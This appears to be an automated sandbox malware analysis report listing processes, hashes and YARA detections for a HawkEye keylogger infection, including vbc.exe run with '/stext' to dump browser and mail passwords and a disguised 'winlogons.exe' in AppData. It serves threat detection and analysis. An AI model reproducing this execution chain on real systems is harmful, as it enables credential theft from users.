                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.265133062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.265486423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:19:15:23
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"
                                                                                                                                                                                    Imagebase:0x1280000
                                                                                                                                                                                    File size:2010632 bytes
                                                                                                                                                                                    MD5 hash:1C7E2FF84A8DA304070EC91B0FFC3051
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:19:15:29
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                                                                                                                    Imagebase:0x4c0000
                                                                                                                                                                                    File size:53248 bytes
                                                                                                                                                                                    MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                    Start time:19:15:32
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287929150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287452128.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                    Start time:19:15:33
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289449551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289148039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                    Start time:19:15:41
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305602938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305230219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:19:15:49
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.322785031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.323179438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:19:15:55
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335659001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335973967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                    Start time:19:16:37
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                    Start time:19:17:01
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    No disassembly